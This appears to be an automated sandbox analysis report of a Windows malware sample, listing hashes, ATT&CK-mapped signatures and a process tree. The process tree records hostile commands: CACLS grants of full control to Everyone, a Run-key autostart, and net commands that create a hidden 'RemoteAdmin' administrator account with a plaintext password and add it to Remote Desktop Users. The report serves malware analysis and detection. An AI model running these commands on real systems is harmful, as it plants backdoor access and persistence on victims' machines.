Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25/08/2024, 10:10
Static task
static1
Behavioral task
behavioral1
Sample
c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
-
Size
854KB
-
MD5
c0822b0d14b651b6e1c018c8c0bca9d2
-
SHA1
424d410d3daa2f3b5cfe5cc369f7eee654c042ba
-
SHA256
a4a71e8143d4c321322829a9e0b84eff48327bdc39fc3f0a8c56263f153d17d3
-
SHA512
d4a45f060923c15641bd0588a4799659511dffb8998943514a7388d340267824bbc9f8bd93a30ef139364a1048d65c773c5f2a3aabad23519130363827b1337f
-
SSDEEP
12288:AraepSMZpe26zfs25lRL0Ktu9w4xW7tI4m7kbchfide0sHTkz21ITCqE38AExV:aZwr26jNLeeClWQAU6eKz2COqaF0
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 2420 net.exe 3112 net1.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 4828 net.exe 832 net1.exe -
Executes dropped EXE 10 IoCs
pid Process 1100 tzuP.exe 2756 desktop.exe 4692 cmss.exe 1792 msn.exe 3064 lsass.exe 2428 lsass.exe 4684 msn.exe 1808 cmss.exe 3408 lsass.exe 1596 lsass.exe -
Loads dropped DLL 4 IoCs
pid Process 2756 desktop.exe 2756 desktop.exe 3064 lsass.exe 4692 cmss.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ccUpdate = "C:\\Windows\\msn.exe" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ccUpdate = "C:\\Windows\\msn.exe" cmss.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File opened for modification C:\Program Files\Accessories\Common\desktop.ini desktop.exe File created C:\Program Files\Accessories\Common\desktop.ini desktop.exe -
Modifies WinLogon 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts cmss.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList cmss.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\RemoteAdmin = "0" cmss.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\MSWINSCK.OCX desktop.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\RemoteAdmin = "0" cmss.exe -
Drops file in Program Files directory 7 IoCs
description ioc Process File opened for modification C:\Program Files\Accessories\Common\clog.txt msn.exe File opened for modification C:\Program Files\Accessories\Common\25 Aug 24 10_10_38 Admin .rna cmss.exe File opened for modification C:\Program Files\Accessories\Common\25 Aug 24 10_10_48 Admin .rna cmss.exe File opened for modification C:\Program Files\Accessories\Common desktop.exe File opened for modification C:\Program Files\Accessories\Common\desktop.ini desktop.exe File created C:\Program Files\Accessories\Common\desktop.ini desktop.exe File opened for modification C:\Program Files\Accessories\Common\log.txt msn.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\spool\cmss.exe desktop.exe File created C:\Windows\netcox.exe desktop.exe File created C:\Windows\ziplog.txt desktop.exe File created C:\Windows\hpreg.dll desktop.exe File created C:\Windows\spool\lsass.exe desktop.exe File opened for modification C:\Windows\spool\lsass.exe desktop.exe File opened for modification C:\Windows\hpreg.dll desktop.exe File created C:\Windows\msn.exe desktop.exe File created C:\Windows\refsdm.dll desktop.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lsass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lsass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tzuP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language desktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lsass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lsass.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Programmable desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ = "DMSWinsockControlEvents" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CurVer\ = "MSWinsock.Winsock.1" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\ = "C:\\Windows\\SysWow64\\MSWINSCK.OCX, 1" desktop.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D} desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ = "C:\\Windows\\SysWow64\\MSWINSCK.OCX" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D} desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS\ = "2" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ = "IMSWinsockControl" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D} desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32 desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\ = "Microsoft Winsock Control 6.0 (SP5)" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32 desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\MSWINSCK.OCX" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ = "IMSWinsockControl" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32 desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ = "C:\\Windows\\SysWow64\\MSWINSCK.OCX" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CLSID desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\Version = "1.0" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D} desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1\ = "Microsoft WinSock Control, version 6.0" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32 desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0 desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\ = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\ = "Microsoft WinSock Control, version 6.0" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\ = "MSWinsock.Winsock.1" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\ = "0" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\ = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32 desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Control desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\ = "Winsock General Property Page Object" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\ = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\Version = "1.0" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D} desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ = "Microsoft WinSock Control, version 6.0" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1 desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\ = "MSWinsock.Winsock" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32 desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1\CLSID\ = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32 desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CurVer desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR\ desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\ = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CLSID\ = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}" desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352} desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D} desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D} desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" desktop.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ = "DMSWinsockControlEvents" desktop.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D} desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1\CLSID desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID desktop.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0 desktop.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe 4692 cmss.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1792 msn.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2756 desktop.exe 4692 cmss.exe 1792 msn.exe 3064 lsass.exe 2428 lsass.exe 4684 msn.exe 1808 cmss.exe 3408 lsass.exe 1792 msn.exe 1596 lsass.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1068 wrote to memory of 1100 1068 c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe 86 PID 1068 wrote to memory of 1100 1068 c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe 86 PID 1068 wrote to memory of 1100 1068 c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe 86 PID 1100 wrote to memory of 2756 1100 tzuP.exe 87 PID 1100 wrote to memory of 2756 1100 tzuP.exe 87 PID 1100 wrote to memory of 2756 1100 tzuP.exe 87 PID 2756 wrote to memory of 264 2756 desktop.exe 88 PID 2756 wrote to memory of 264 2756 desktop.exe 88 PID 2756 wrote to memory of 264 2756 desktop.exe 88 PID 264 wrote to memory of 212 264 cmd.exe 90 PID 264 wrote to memory of 212 264 cmd.exe 90 PID 264 wrote to memory of 212 264 cmd.exe 90 PID 264 wrote to memory of 3736 264 cmd.exe 91 PID 264 wrote to memory of 3736 264 cmd.exe 91 PID 264 wrote to memory of 3736 264 cmd.exe 91 PID 2756 wrote to memory of 1048 2756 desktop.exe 93 PID 2756 wrote to memory of 1048 2756 desktop.exe 93 PID 2756 wrote to memory of 1048 2756 desktop.exe 93 PID 2756 wrote to memory of 4692 2756 desktop.exe 95 PID 2756 wrote to memory of 4692 2756 desktop.exe 95 PID 2756 wrote to memory of 4692 2756 desktop.exe 95 PID 1048 wrote to memory of 4968 1048 cmd.exe 96 PID 1048 wrote to memory of 4968 1048 cmd.exe 96 PID 1048 wrote to memory of 4968 1048 cmd.exe 96 PID 1048 wrote to memory of 740 1048 cmd.exe 97 PID 1048 wrote to memory of 740 1048 cmd.exe 97 PID 1048 wrote to memory of 740 1048 cmd.exe 97 PID 2756 wrote to memory of 1792 2756 desktop.exe 98 PID 2756 wrote to memory of 1792 2756 desktop.exe 98 PID 2756 wrote to memory of 1792 2756 desktop.exe 98 PID 1792 wrote to memory of 3064 1792 msn.exe 99 PID 1792 wrote to memory of 3064 1792 msn.exe 99 PID 1792 wrote to memory of 3064 1792 msn.exe 99 PID 4692 wrote to memory of 2428 4692 cmss.exe 100 PID 4692 wrote to memory of 2428 4692 cmss.exe 100 PID 4692 wrote to memory of 2428 4692 cmss.exe 100 PID 4692 wrote to memory of 4684 4692 cmss.exe 102 PID 4692 wrote to memory of 4684 4692 cmss.exe 102 PID 4692 wrote to memory of 4684 4692 cmss.exe 102 PID 1792 wrote to memory of 1808 1792 msn.exe 103 PID 1792 wrote to memory of 1808 1792 msn.exe 103 PID 1792 wrote to memory of 1808 1792 msn.exe 103 PID 4692 wrote to memory of 3408 4692 cmss.exe 104 PID 4692 wrote to memory of 3408 4692 cmss.exe 104 PID 4692 wrote to memory of 3408 4692 cmss.exe 104 PID 4692 wrote to memory of 3684 4692 cmss.exe 105 PID 4692 wrote to memory of 3684 4692 cmss.exe 105 PID 4692 wrote to memory of 3684 4692 cmss.exe 105 PID 4692 wrote to memory of 1404 4692 cmss.exe 106 PID 4692 wrote to memory of 1404 4692 cmss.exe 106 PID 4692 wrote to memory of 1404 4692 cmss.exe 106 PID 4692 wrote to memory of 4828 4692 cmss.exe 107 PID 4692 wrote to memory of 4828 4692 cmss.exe 107 PID 4692 wrote to memory of 4828 4692 cmss.exe 107 PID 4692 wrote to memory of 2420 4692 cmss.exe 108 PID 4692 wrote to memory of 2420 4692 cmss.exe 108 PID 4692 wrote to memory of 2420 4692 cmss.exe 108 PID 2756 wrote to memory of 1596 2756 desktop.exe 109 PID 2756 wrote to memory of 1596 2756 desktop.exe 109 PID 2756 wrote to memory of 1596 2756 desktop.exe 109 PID 3684 wrote to memory of 4608 3684 net.exe 114 PID 3684 wrote to memory of 4608 3684 net.exe 114 PID 3684 wrote to memory of 4608 3684 net.exe 114 PID 4828 wrote to memory of 832 4828 net.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\tzuP.exetzuP.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\Compress0\desktop.exe"C:\Users\Admin\AppData\Local\Temp\Compress0\desktop.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\cmd.execmd /c echo y| CACLS C:\Windows\spool /G Everyone:f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵
- System Location Discovery: System Language Discovery
PID:212
-
-
C:\Windows\SysWOW64\cacls.exeCACLS C:\Windows\spool /G Everyone:f5⤵
- System Location Discovery: System Language Discovery
PID:3736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo y| CACLS C:\PROGRA~1\ACCESS~1\Common /G Everyone:f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵
- System Location Discovery: System Language Discovery
PID:4968
-
-
C:\Windows\SysWOW64\cacls.exeCACLS C:\PROGRA~1\ACCESS~1\Common /G Everyone:f5⤵
- System Location Discovery: System Language Discovery
PID:740
-
-
-
C:\Windows\spool\cmss.exeC:\Windows\spool\cmss.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\spool\lsass.exeC:\Windows\spool\lsass.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2428
-
-
C:\Windows\msn.exeC:\Windows\msn.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4684
-
-
C:\Windows\spool\lsass.exeC:\Windows\spool\lsass.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3408
-
-
C:\Windows\SysWOW64\net.exenet user RemoteAdmin ecotopia /add5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user RemoteAdmin ecotopia /add6⤵
- System Location Discovery: System Language Discovery
PID:4608
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators /Add RemoteAdmin5⤵
- System Location Discovery: System Language Discovery
PID:1404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators /Add RemoteAdmin6⤵
- System Location Discovery: System Language Discovery
PID:3052
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup users /Delete RemoteAdmin5⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup users /Delete RemoteAdmin6⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
PID:832
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" /Add RemoteAdmin5⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:2420 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" /Add RemoteAdmin6⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:3112
-
-
-
-
C:\Windows\msn.exeC:\Windows\msn.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\spool\lsass.exeC:\Windows\spool\lsass.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3064
-
-
C:\Windows\spool\cmss.exeC:\Windows\spool\cmss.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1808
-
-
-
C:\Windows\spool\lsass.exeC:\Windows\spool\lsass.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1596
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Users
1Indicator Removal
1Network Share Connection Removal
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
198B
MD5fceb994bd3c60029331a22a53c19871b
SHA1e9bd26049ba5b4bfdea8c8e0051ad37250d870c0
